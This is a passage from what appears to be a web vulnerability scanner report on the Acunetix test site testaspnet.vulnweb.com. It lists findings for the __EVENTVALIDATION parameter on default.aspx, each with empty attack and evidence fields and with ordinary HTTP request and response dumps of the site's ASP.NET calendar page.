comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8285&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAT%2BhjkNoIZGRkrPuhP0xmn1NJD7Gjras3Ct9CE38%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpmLLiCwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqmYTWs%2BNAGTvkRowDyx84N2saN5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:03 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAT+hjkNoIZGRkrPuhP0xmn1NJD7Gjras3Ct9CE38=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpmLLiCwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqmYTWs+NAGTvkRowDyx84N2saN5" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:White" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
